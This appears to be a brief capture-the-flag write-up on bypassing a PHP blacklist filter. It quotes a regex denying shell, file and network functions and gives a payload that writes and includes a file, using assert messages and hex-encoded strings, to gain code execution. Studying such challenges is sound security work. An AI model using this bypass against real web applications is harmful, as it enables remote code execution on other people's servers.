Rating: 2.5
assert(s) used to get warning(s) and output.
Class C1 used as const container, just for stuff to be readable (and easy to debug)
Hex-encoded strings - to bypass restrictions:
```
if (preg_match('/(([)]|["]|[\']|pcntl_alarm|pcntl_fork|pcntl_waitpid|file|pcntl_wait|pcntl_wifexited|pcntl_wifstopped|pcntl_wifsignaled|scandir|pcntl_wexitstatus|pcntl_wtermsig|pcntl_wstopsig|pcntl_signal|pcntl_signal_dispatch|pcntl_get_last_error|pcntl_strerror|pcntl_sigprocmask|pcntl_sigwaitinfo|pcntl_sigtimedwait|pcntl_exec|pcntl_getpriority|pcntl_setpriority|exec|shell_exec|proc_open|popen|system|passthru|file_get_contents|readfile|fopen|ini_set|fgets|fgetcsv|parse_ini_file|rename|copy|symlink|fseek|file_exists|delete|chmod|fpassthru|freed|fscanf|stream_wrapper_register|stream_wrapper_restore|fsockopen|pfsockopen|curl_init|stream_context_create|show_source|highlight_file|sleep|token_get_all|yaml_parse_file)(\s+)?\()|\$|\/\*.*\*\/|\/\/|\.|\//i', $_REQUEST['cmd'])){
echo 'Leave me alone hacker'; die();
}
```
Payload:
```
cmd=>
function main(): void {
assert(1==2,"STEP1");
assert(file_put_contents(C1::F1, C1::D3),"WFAIL");
assert(1==2,"STEP2");
include(C1::F1);
assert(1==2,foo());
assert(13=="\x33",__DIR__);
}
```
